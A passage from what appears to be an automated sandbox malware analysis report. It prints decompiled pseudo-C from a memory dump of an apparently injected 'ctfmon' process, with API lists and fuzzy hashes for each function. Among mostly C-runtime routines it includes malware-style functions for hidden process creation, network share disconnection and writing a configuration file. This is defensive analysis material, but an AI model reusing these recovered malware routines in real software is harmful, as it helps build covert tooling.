                                                							goto L38;
                                                						}
                                                						__eflags = _t107 - 1;
                                                						if(_t107 != 1) {
                                                							goto L9;
                                                						}
                                                						goto L6;
                                                					}
                                                					 *(E00975D30()) =  *_t99 & _t121;
                                                					 *((intOrPtr*)(E00975D43())) = 0x16;
                                                					E00975C10();
                                                					goto L41;
                                                				}
                                                				goto L41;
                                                 			}
                                                0x0097d889
                                                0x0097d88c
                                                0x00000000
                                                0x00000000
                                                0x0097d89a
                                                0x00000000
                                                0x0097d89f
                                                0x0097d881
                                                0x0097d847
                                                0x0097d84f
                                                0x0097d855
                                                0x00000000
                                                0x0097d855
                                                0x0097d835
                                                0x0097d838
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097d838
                                                0x0097d7f4
                                                0x0097d7fb
                                                0x0097d801
                                                0x00000000
                                                0x0097d806
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /LU5/
                                                • API String ID: 0-937868281
                                                • Opcode ID: 1dc267ca5eb1fa06f96219b9acfd89eec64833ee937135aad1c3048c5db227cf
                                                • Instruction ID: 453a4c7370c0056594e8235113eb9815a635865ead37d69d2bf78612d56bdd50
                                                • Opcode Fuzzy Hash: 1dc267ca5eb1fa06f96219b9acfd89eec64833ee937135aad1c3048c5db227cf
                                                • Instruction Fuzzy Hash: 1B510573D12209EFDB219FA8C849FEEBBB8AF85310F158459E50CA7292D7749D00CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E00976BBC(signed int* __ecx, signed int __edx) {
                                                				signed int _v8;
                                                				intOrPtr* _v12;
                                                				signed int _v16;
                                                				signed int _t28;
                                                				signed int _t29;
                                                				intOrPtr _t33;
                                                				signed int _t37;
                                                				signed int _t38;
                                                				signed int _t40;
                                                				void* _t50;
                                                				signed int _t56;
                                                				intOrPtr* _t57;
                                                				signed int _t68;
                                                				signed int _t71;
                                                				signed int _t72;
                                                				signed int _t74;
                                                				signed int _t75;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				signed int* _t81;
                                                				signed int _t85;
                                                				void* _t86;
                                                
                                                				_t72 = __edx;
                                                				_v12 = __ecx;
                                                				_t28 =  *__ecx;
                                                				_t81 =  *_t28;
                                                				if(_t81 != 0) {
                                                					_t29 =  *0x98f008; // 0x35554c2f
                                                					_t56 =  *_t81 ^ _t29;
                                                					_t78 = _t81[1] ^ _t29;
                                                					_t83 = _t81[2] ^ _t29;
                                                					asm("ror edi, cl");
                                                					asm("ror esi, cl");
                                                					asm("ror ebx, cl");
                                                					if(_t78 != _t83) {
                                                						L14:
                                                						 *_t78 = E00976A7D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                						_t33 = E00970ABD(_t56);
                                                						_t57 = _v12;
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                						_t24 = _t78 + 4; // 0x4
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00970ABD(_t24);
                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00970ABD(_t83);
                                                						_t37 = 0;
                                                						L15:
                                                						return _t37;
                                                					}
                                                					_t38 = 0x200;
                                                					_t85 = _t83 - _t56 >> 2;
                                                					if(_t85 <= 0x200) {
                                                						_t38 = _t85;
                                                					}
                                                					_t80 = _t38 + _t85;
                                                					if(_t80 == 0) {
                                                						_t80 = 0x20;
                                                					}
                                                					if(_t80 < _t85) {
                                                						L9:
                                                						_push(4);
                                                						_t80 = _t85 + 4;
                                                						_push(_t80);
                                                						_v8 = E0097B348(_t56);
                                                						_t40 = E00977848(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							goto L11;
                                                						}
                                                						_t37 = _t40 | 0xffffffff;
                                                						goto L15;
                                                					} else {
                                                						_push(4);
                                                						_push(_t80);
                                                						_v8 = E0097B348(_t56);
                                                						E00977848(0);
                                                						_t68 = _v8;
                                                						_t86 = _t86 + 0x10;
                                                						if(_t68 != 0) {
                                                							L11:
                                                							_t56 = _t68;
                                                							_v8 = _t68 + _t85 * 4;
                                                							_t83 = _t68 + _t80 * 4;
                                                							_t78 = _v8;
                                                							_push(0x20);
                                                							asm("ror eax, cl");
                                                							_t71 = _t78;
                                                							_v16 = 0 ^  *0x98f008;
                                                							asm("sbb edx, edx");
                                                							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                							_v8 = _t74;
                                                							if(_t74 == 0) {
                                                								goto L14;
                                                							}
                                                							_t75 = _v16;
                                                							_t50 = 0;
                                                							do {
                                                								_t50 = _t50 + 1;
                                                								 *_t71 = _t75;
                                                								_t71 = _t71 + 4;
                                                							} while (_t50 != _v8);
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                				}
                                                				return _t28 | 0xffffffff;
                                                			}

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /LU5/
                                                • API String ID: 0-937868281
                                                • Opcode ID: aac9fb0883b8dc988dea86217dfbd5da4c31531648fa150d36d580fcea345004
                                                • Instruction ID: bab33d1814998fdc06241110d9c218d3dfb6b9a44e4dcd8fbe18fae06eebffd7
                                                • Opcode Fuzzy Hash: aac9fb0883b8dc988dea86217dfbd5da4c31531648fa150d36d580fcea345004
                                                • Instruction Fuzzy Hash: 94419073A007009FCB15DF78C985A59B7E5EF85314F258569E699EB341E731AD01CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 89%
                                                			E0097D5A5(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v12;
                                                				short _v1716;
                                                				char _v5132;
                                                				intOrPtr _v5136;
                                                				long _v5140;
                                                				void* _v5144;
                                                				int _v5148;
                                                				void* __esi;
                                                				signed int _t31;
                                                				intOrPtr _t38;
                                                				signed int* _t41;
                                                				int _t45;
                                                				int _t54;
                                                				signed int _t56;
                                                				signed int _t58;
                                                				signed short* _t59;
                                                				signed int _t65;
                                                				signed int _t67;
                                                				signed short* _t69;
                                                				intOrPtr* _t72;
                                                				void* _t73;
                                                				intOrPtr _t74;
                                                				signed int _t75;
                                                
                                                				E00983CA0();
                                                				_t31 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t31 ^ _t75;
                                                				_t56 = _a8;
                                                				_t58 = (_t56 & 0x0000003f) * 0x30;
                                                				_t54 = 0;
                                                				_t72 = _a4;
                                                				_t7 = _t58 + 0x18; // 0xcccccccc
                                                				_t59 = _a12;
                                                				_t69 = _t59;
                                                				_v5144 =  *((intOrPtr*)( *((intOrPtr*)(0x996480 + (_t56 >> 6) * 4)) + _t7));
                                                				_t38 = _a16 + _t59;
                                                				 *_t72 = 0;
                                                				 *((intOrPtr*)(_t72 + 4)) = 0;
                                                				_v5136 = _t38;
                                                				 *((intOrPtr*)(_t72 + 8)) = 0;
                                                				if(_t59 < _t38) {
                                                					while(1) {
                                                						L1:
                                                						_t74 = _v5136;
                                                						_t41 =  &_v1716;
                                                						while(_t69 < _t74) {
                                                							_t65 =  *_t69 & 0x0000ffff;
                                                							_t69 =  &(_t69[1]);
                                                							if(_t65 == 0xa) {
                                                								_t67 = 0xd;
                                                								 *_t41 = _t67;
                                                								_t41 =  &(_t41[0]);
                                                							}
                                                							 *_t41 = _t65;
                                                							_t41 =  &(_t41[0]);
                                                							if(_t41 <  &_v12) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_t45 = WideCharToMultiByte(0xfde9, _t54,  &_v1716, _t41 -  &_v1716 >> 1,  &_v5132, 0xd55, _t54, _t54);
                                                						_t72 = _a4;
                                                						_v5148 = _t45;
                                                						if(_t45 == 0) {
                                                							L11:
                                                							 *_t72 = GetLastError();
                                                						} else {
                                                							while(WriteFile(_v5144,  &(( &_v5132)[_t54]), _t45 - _t54,  &_v5140, 0) != 0) {
                                                								_t54 = _t54 + _v5140;
                                                								_t45 = _v5148;
                                                								if(_t54 < _t45) {
                                                									continue;
                                                								} else {
                                                									 *((intOrPtr*)(_t72 + 4)) = _t69 - _a12;
                                                									if(_t69 < _v5136) {
                                                										_t54 = 0;
                                                										goto L1;
                                                									}
                                                								}
                                                								goto L12;
                                                							}
                                                							goto L11;
                                                						}
                                                						goto L12;
                                                					}
                                                				}
                                                				L12:
                                                				_pop(_t73);
                                                				return E00970A5D(_v8 ^ _t75, _t73);
                                                			}

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000010,0096971E,08A10000,?,0097D904,00000000,0096971E,00000010), ref: 0097D658
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0097D904,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64), ref: 0097D686
                                                • GetLastError.KERNEL32(?,0097D904,00000000,0096971E,00000010,0096971E,0096971E,?,0096971E,?,00975E64,0096971E,?,00000000,?,00975EFD), ref: 0097D6B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                • String ID: /LU5/
                                                • API String ID: 2456169464-937868281
                                                • Opcode ID: 7842dd19587465b45adddff877d5562eb29b0226f53065273450e0e59ad0e4d8
                                                • Instruction ID: 9fa9ed42bb7162992ef04b079a9d9ec81f1da47421ee4f1d7b23517f4dc04880
                                                • Opcode Fuzzy Hash: 7842dd19587465b45adddff877d5562eb29b0226f53065273450e0e59ad0e4d8
                                                • Instruction Fuzzy Hash: 90316176A112199FDB14CF69DC81AEAB7B8EF48304F1484ADE90ED7350D630AD84CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0096A630(void* __ecx, long __edx, WCHAR* _a4) {
                                                				long _v8;
                                                				int _t10;
                                                				void* _t16;
                                                				void* _t25;
                                                				long _t30;
                                                
                                                				_push(__ecx);
                                                				_t30 = __edx;
                                                				_t16 = __ecx;
                                                				if(__edx == 0 || __ecx == 0) {
                                                					return 0;
                                                				} else {
                                                					_t25 = CreateFileW(_a4, 0xc0000000, 0, 0, 2, 0, 0);
                                                					if(_t25 != 0xffffffff) {
                                                						_v8 = 0;
                                                						_t10 = WriteFile(_t25, _t16, _t30,  &_v8, 0);
                                                						CloseHandle(_t25);
                                                						if((_t16 & 0xffffff00 | _t10 != 0x00000000) == 0 || _v8 != _t30) {
                                                							return 0;
                                                						} else {
                                                							return 1;
                                                						}
                                                					} else {
                                                						return 0;
                                                					}
                                                				}
                                                			}









                                                APIs
                                                • CreateFileW.KERNEL32(0096A81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A,?), ref: 0096A655
                                                • WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A67B
                                                • CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,0096A81A), ref: 0096A687
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: CONFIGURATION
                                                • API String ID: 1065093856-2209261362
                                                • Opcode ID: 09ef4195a1dfa7783927f646153d2d6ca8147fe020aae6ddb93efe90f6ff1647
                                                • Instruction ID: e8e8abfb06b4edf3fe1db3ce3f1f7707354c202f30537b8989c366a6c037a55c
                                                • Opcode Fuzzy Hash: 09ef4195a1dfa7783927f646153d2d6ca8147fe020aae6ddb93efe90f6ff1647
                                                • Instruction Fuzzy Hash: E701F53279121877EB30896AFC46BFAB79CD782B31F1402ABFE0CE7280D6614C042591
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00964F50(CHAR* __ecx, CHAR* __edx, void* __eflags, CHAR* _a4) {
                                                				struct _STARTUPINFOA _v72;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t17;
                                                				CHAR* _t20;
                                                				CHAR* _t23;
                                                				void* _t24;
                                                				struct _PROCESS_INFORMATION* _t25;
                                                				void* _t28;
                                                
                                                				_t28 = __eflags;
                                                				_t23 = __edx;
                                                				_t20 = __ecx;
                                                				E00973440(__edx,  &_v72, 0, 0x44);
                                                				_t25 = E00970A6E(_t24, _t28, 0x10);
                                                				E00973440(_t23,  &_v72, 0, 0x44);
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movups [esi], xmm0");
                                                				GetStartupInfoA( &_v72);
                                                				_v72.cb = 0x44;
                                                				_v72.wShowWindow = 0;
                                                				_v72.dwFlags = 1;
                                                				_t17 = CreateProcessA(_t20, _t23, 0, 0, 0, 0x20, 0, _a4,  &_v72, _t25);
                                                				asm("sbb eax, eax");
                                                				return  ~_t17 & _t25;
                                                			}













                                                APIs
                                                • new.LIBCMT ref: 00964F6C
                                                • GetStartupInfoA.KERNEL32(?), ref: 00964F8D
                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,0096985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 00964FBB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CreateInfoProcessStartup
                                                • String ID: D
                                                • API String ID: 525363069-2746444292
                                                • Opcode ID: da74de8f4662ac6e781073b361ec3892808c27ea6ceb619cf74f21a49d4c505d
                                                • Instruction ID: 77b5f39b5b1891a4ebbc548a8c43fde04d9e52676309d99f364317acb5317279
                                                • Opcode Fuzzy Hash: da74de8f4662ac6e781073b361ec3892808c27ea6ceb619cf74f21a49d4c505d
                                                • Instruction Fuzzy Hash: 640188B1A4030876EB20DFA08D46FDE77ACDF44B04F204125B708FA1C1E6B5AA444395
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0096B1F0(intOrPtr* __ecx, void* __esi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				signed int _t12;
                                                				char _t14;
                                                				long _t20;
                                                				intOrPtr* _t25;
                                                				void* _t32;
                                                				signed int _t34;
                                                
                                                				_t25 = __ecx;
                                                				_t12 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t12 ^ _t34;
                                                				_t32 =  &_v268 - __ecx;
                                                				do {
                                                					_t14 =  *_t25;
                                                					_t25 = _t25 + 1;
                                                					 *((char*)(_t32 + _t25 - 1)) = _t14;
                                                				} while (_t14 != 0);
                                                				E0096A2B0( &_v268);
                                                				E00963F90( &_v268,  &_v528, "\\\\%s",  &_v268);
                                                				_t20 = WNetCancelConnection2A( &_v528, 0, 1);
                                                				if(_t20 != 0) {
                                                					SetLastError(_t20);
                                                					return E00970A5D(_v8 ^ _t34, __esi);
                                                				} else {
                                                					return E00970A5D(_v8 ^ _t34, __esi);
                                                				}
                                                			}













                                                APIs
                                                • WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 0096B24E
                                                • SetLastError.KERNEL32(00000000), ref: 0096B26C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CancelConnection2ErrorLast
                                                • String ID: /LU5/$\\%s
                                                • API String ID: 822135197-2245926631
                                                • Opcode ID: c87e399e97f6c7a0455b627d870c9ac1aee644f0ae036c0c0b139195cf54585a
                                                • Instruction ID: c79ac55f7de2b57defef9cd1581624629cbb9ebe5d6ea2a036f567edf2d7b21d
                                                • Opcode Fuzzy Hash: c87e399e97f6c7a0455b627d870c9ac1aee644f0ae036c0c0b139195cf54585a
                                                • Instruction Fuzzy Hash: B3017575A0820CDBCB20DFB4DC59BE9B7B8EB55304F1041E9E85DDB282EE715A888B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E0097932B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				unsigned int _v20;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				char _v40;
                                                				intOrPtr _v48;
                                                				char _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* _t86;
                                                				signed int _t92;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed int _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                				void* _t104;
                                                				void* _t107;
                                                				void* _t109;
                                                				void* _t111;
                                                				void* _t115;
                                                				char* _t116;
                                                				void* _t119;
                                                				signed int _t121;
                                                				signed int _t128;
                                                				signed int* _t129;
                                                				signed int _t136;
                                                				signed int _t137;
                                                				char _t138;
                                                				signed int _t139;
                                                				signed int _t142;
                                                				signed int _t146;
                                                				signed int _t151;
                                                				char _t156;
                                                				char _t157;
                                                				void* _t161;
                                                				unsigned int _t162;
                                                				signed int _t164;
                                                				signed int _t166;
                                                				signed int _t170;
                                                				void* _t171;
                                                				signed int* _t172;
                                                				signed int _t174;
                                                				signed int _t181;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				signed int _t184;
                                                				signed int _t185;
                                                				signed int _t186;
                                                				signed int _t187;
                                                
                                                				_t171 = __edx;
                                                				_t181 = _a24;
                                                				if(_t181 < 0) {
                                                					_t181 = 0;
                                                				}
                                                				_t184 = _a8;
                                                				 *_t184 = 0;
                                                				E00974970(0,  &_v52, _t171, _a36);
                                                				_t5 = _t181 + 0xb; // 0xb
                                                				if(_a12 > _t5) {
                                                					_t172 = _a4;
                                                					_t142 = _t172[1];
                                                					_v36 =  *_t172;
                                                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                						L11:
                                                						__eflags = _t142 & 0x80000000;
                                                						if((_t142 & 0x80000000) != 0) {
                                                							 *_t184 = 0x2d;
                                                							_t184 = _t184 + 1;
                                                							__eflags = _t184;
                                                						}
                                                						__eflags = _a28;
                                                						_v16 = 0x3ff;
                                                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                						__eflags = _t172[1] & 0x7ff00000;
                                                						_v32 = _t136;
                                                						_t86 = 0x30;
                                                						if((_t172[1] & 0x7ff00000) != 0) {
                                                							 *_t184 = 0x31;
                                                							_t185 = _t184 + 1;
                                                							__eflags = _t185;
                                                						} else {
                                                							 *_t184 = _t86;
                                                							_t185 = _t184 + 1;
                                                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                							__eflags = _t164;
                                                							if(_t164 != 0) {
                                                								_v16 = 0x3fe;
                                                							} else {
                                                								_v16 = _v16 & _t164;
                                                							}
                                                						}
                                                						_t146 = _t185;
                                                						_t186 = _t185 + 1;
                                                						_v28 = _t146;
                                                						__eflags = _t181;
                                                						if(_t181 != 0) {
                                                							_t30 = _v48 + 0x88; // 0xffce8305
                                                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                						} else {
                                                							 *_t146 = 0;
                                                						}
                                                						_t92 = _t172[1] & 0x000fffff;
                                                						__eflags = _t92;
                                                						_v20 = _t92;
                                                						if(_t92 > 0) {
                                                							L23:
                                                							_t33 =  &_v8;
                                                							 *_t33 = _v8 & 0x00000000;
                                                							__eflags =  *_t33;
                                                							_t147 = 0xf0000;
                                                							_t93 = 0x30;
                                                							_v12 = _t93;
                                                							_v20 = 0xf0000;
                                                							do {
                                                								__eflags = _t181;
                                                								if(_t181 <= 0) {
                                                									break;
                                                								}
                                                								_t119 = E00983C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                								_t161 = 0x30;
                                                								_t121 = _t119 + _t161 & 0x0000ffff;
                                                								__eflags = _t121 - 0x39;
                                                								if(_t121 > 0x39) {
                                                									_t121 = _t121 + _t136;
                                                									__eflags = _t121;
                                                								}
                                                								_t162 = _v20;
                                                								_t172 = _a4;
                                                								 *_t186 = _t121;
                                                								_t186 = _t186 + 1;
                                                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                								_t147 = _t162 >> 4;
                                                								_t93 = _v12 - 4;
                                                								_t181 = _t181 - 1;
                                                								_v20 = _t162 >> 4;
                                                								_v12 = _t93;
                                                								__eflags = _t93;
                                                							} while (_t93 >= 0);
                                                							__eflags = _t93;
                                                							if(_t93 < 0) {
                                                								goto L39;
                                                							}
                                                							_t115 = E00983C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                							__eflags = _t115 - 8;
                                                							if(_t115 <= 8) {
                                                								goto L39;
                                                							}
                                                							_t116 = _t186 - 1;
                                                							_t138 = 0x30;
                                                							while(1) {
                                                								_t156 =  *_t116;
                                                								__eflags = _t156 - 0x66;
                                                								if(_t156 == 0x66) {
                                                									goto L33;
                                                								}
                                                								__eflags = _t156 - 0x46;
                                                								if(_t156 != 0x46) {
                                                									_t139 = _v32;
                                                									__eflags = _t116 - _v28;
                                                									if(_t116 == _v28) {
                                                										_t57 = _t116 - 1;
                                                										 *_t57 =  *(_t116 - 1) + 1;
                                                										__eflags =  *_t57;
                                                									} else {
                                                										_t157 =  *_t116;
                                                										__eflags = _t157 - 0x39;
                                                										if(_t157 != 0x39) {
                                                											 *_t116 = _t157 + 1;
                                                										} else {
                                                											 *_t116 = _t139 + 0x3a;
                                                										}
                                                									}
                                                									goto L39;
                                                								}
                                                								L33:
                                                								 *_t116 = _t138;
                                                								_t116 = _t116 - 1;
                                                							}
                                                						} else {
                                                							__eflags =  *_t172;
                                                							if( *_t172 <= 0) {
                                                								L39:
                                                								__eflags = _t181;
                                                								if(_t181 > 0) {
                                                									_push(_t181);
                                                									_t111 = 0x30;
                                                									_push(_t111);
                                                									_push(_t186);
                                                									E00973440(_t181);
                                                									_t186 = _t186 + _t181;
                                                									__eflags = _t186;
                                                								}
                                                								_t94 = _v28;
                                                								__eflags =  *_t94;
                                                								if( *_t94 == 0) {
                                                									_t186 = _t94;
                                                								}
                                                								__eflags = _a28;
                                                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								_t174 = _a4[1];
                                                								_t100 = E00983C50( *_a4, 0x34, _t174);
                                                								_t137 = 0;
                                                								_t151 = (_t100 & 0x000007ff) - _v16;
                                                								__eflags = _t151;
                                                								asm("sbb ebx, ebx");
                                                								if(__eflags < 0) {
                                                									L47:
                                                									 *(_t186 + 1) = 0x2d;
                                                									_t187 = _t186 + 2;
                                                									__eflags = _t187;
                                                									_t151 =  ~_t151;
                                                									asm("adc ebx, 0x0");
                                                									_t137 =  ~_t137;
                                                									goto L48;
                                                								} else {
                                                									if(__eflags > 0) {
                                                										L46:
                                                										 *(_t186 + 1) = 0x2b;
                                                										_t187 = _t186 + 2;
                                                										L48:
                                                										_t182 = _t187;
                                                										_t101 = 0x30;
                                                										 *_t187 = _t101;
                                                										__eflags = _t137;
                                                										if(__eflags < 0) {
                                                											L56:
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L60:
                                                												_push(0);
                                                												_push(0xa);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t102 = E00983B70();
                                                												_v32 = _t174;
                                                												 *_t187 = _t102 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												L61:
                                                												_t104 = 0x30;
                                                												_t183 = 0;
                                                												__eflags = 0;
                                                												 *_t187 = _t151 + _t104;
                                                												 *(_t187 + 1) = 0;
                                                												goto L62;
                                                											}
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L61;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L60;
                                                											}
                                                											__eflags = _t151 - 0xa;
                                                											if(_t151 < 0xa) {
                                                												goto L61;
                                                											}
                                                											goto L60;
                                                										}
                                                										if(__eflags > 0) {
                                                											L51:
                                                											_push(0);
                                                											_push(0x3e8);
                                                											_push(_t137);
                                                											_push(_t151);
                                                											_t107 = E00983B70();
                                                											_v32 = _t174;
                                                											 *_t187 = _t107 + 0x30;
                                                											_t187 = _t187 + 1;
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L55:
                                                												_push(0);
                                                												_push(0x64);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t109 = E00983B70();
                                                												_v32 = _t174;
                                                												 *_t187 = _t109 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												goto L56;
                                                											}
                                                											L52:
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L56;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L55;
                                                											}
                                                											__eflags = _t151 - 0x64;
                                                											if(_t151 < 0x64) {
                                                												goto L56;
                                                											}
                                                											goto L55;
                                                										}
                                                										__eflags = _t151 - 0x3e8;
                                                										if(_t151 < 0x3e8) {
                                                											goto L52;
                                                										}
                                                										goto L51;
                                                									}
                                                									__eflags = _t151;
                                                									if(_t151 < 0) {
                                                										goto L47;
                                                									}
                                                									goto L46;
                                                								}
                                                							}
                                                							goto L23;
                                                						}
                                                					}
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L11;
                                                					} else {
                                                						_t183 = E0097962E(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                						__eflags = _t183;
                                                						if(_t183 == 0) {
                                                							_t128 = E00984330(_t184, 0x65);
                                                							_pop(_t166);
                                                							__eflags = _t128;
                                                							if(_t128 != 0) {
                                                								__eflags = _a28;
                                                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								__eflags = _t170;
                                                								 *_t128 = _t170;
                                                								 *((char*)(_t128 + 3)) = 0;
                                                							}
                                                							_t183 = 0;
                                                						} else {
                                                							 *_t184 = 0;
                                                						}
                                                						goto L62;
                                                					}
                                                				} else {
                                                					_t129 = E00975D43();
                                                					_t183 = 0x22;
                                                					 *_t129 = _t183;
                                                					E00975C10();
                                                					L62:
                                                					if(_v40 != 0) {
                                                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                					}
                                                					return _t183;
                                                				}
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction ID: bd1480178eadc83491121b90544eebda7d3f50c5fe6ee049f7278b9c57d5e48d
                                                • Opcode Fuzzy Hash: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction Fuzzy Hash: 63A15973A047569FDB22CF28C8917BEBBE9EF55310F18816DE88D9B281D2388D42C750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E0096AE20(void* __ecx, void* __edi, void* __eflags) {
                                                				signed int _v8;
                                                				intOrPtr _v28;
                                                				char _v60;
                                                				intOrPtr _v64;
                                                				signed int _v68;
                                                				char _v72;
                                                				signed int _v76;
                                                				char _v80;
                                                				char _v84;
                                                				void* __esi;
                                                				signed int _t30;
                                                				void* _t34;
                                                				void* _t36;
                                                				long _t41;
                                                				void* _t42;
                                                				void* _t43;
                                                				void* _t60;
                                                				intOrPtr _t64;
                                                				signed int _t67;
                                                				void* _t70;
                                                				void* _t71;
                                                				void* _t72;
                                                				void* _t73;
                                                				void* _t75;
                                                				signed int _t76;
                                                				signed int _t78;
                                                				signed int _t79;
                                                
                                                				_t78 = (_t76 & 0xfffffff0) - 0x58;
                                                				_t30 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t30 ^ _t78;
                                                				_v72 = 0;
                                                				_v80 = 0;
                                                				_t34 = E00964AC0(__ecx, 0x48a,  &_v72,  &_v80);
                                                				_t79 = _t78 + 8;
                                                				if(_t34 != 0) {
                                                					_v84 = 0;
                                                					_v76 = 0;
